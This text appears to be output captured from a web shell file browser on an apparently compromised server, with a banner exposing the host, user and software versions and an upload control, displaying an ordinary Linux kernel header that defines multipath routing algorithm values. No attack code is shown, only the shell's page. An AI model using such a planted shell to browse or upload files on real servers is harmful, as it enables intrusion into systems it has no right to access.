MOON
Server: Apache/2.2.21 (Unix) mod_ssl/2.2.21 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4
System: Linux vps.panamaemb.org.sg 3.10.0-1160.80.1.vz7.191.4 #1 SMP Thu Dec 15 20:31:06 MSK 2022 x86_64
User: panama (500)
PHP: 5.2.17
Disabled: NONE
Upload Files
File: //proc/self/root/proc/3/cwd/usr/include/linux/ip_mp_alg.h
/* ip_mp_alg.h: IPV4 multipath algorithm support, user-visible values.
 *
 * Copyright (C) 2004, 2005 Einar Lueck <elueck@de.ibm.com>
 * Copyright (C) 2005 David S. Miller <davem@davemloft.net>
 */

#ifndef _LINUX_IP_MP_ALG_H
#define _LINUX_IP_MP_ALG_H

enum ip_mp_alg {
	IP_MP_ALG_NONE,
	IP_MP_ALG_RR,
	IP_MP_ALG_DRR,
	IP_MP_ALG_RANDOM,
	IP_MP_ALG_WRANDOM,
	__IP_MP_ALG_MAX
};

#define IP_MP_ALG_MAX (__IP_MP_ALG_MAX - 1)

#endif /* _LINUX_IP_MP_ALG_H */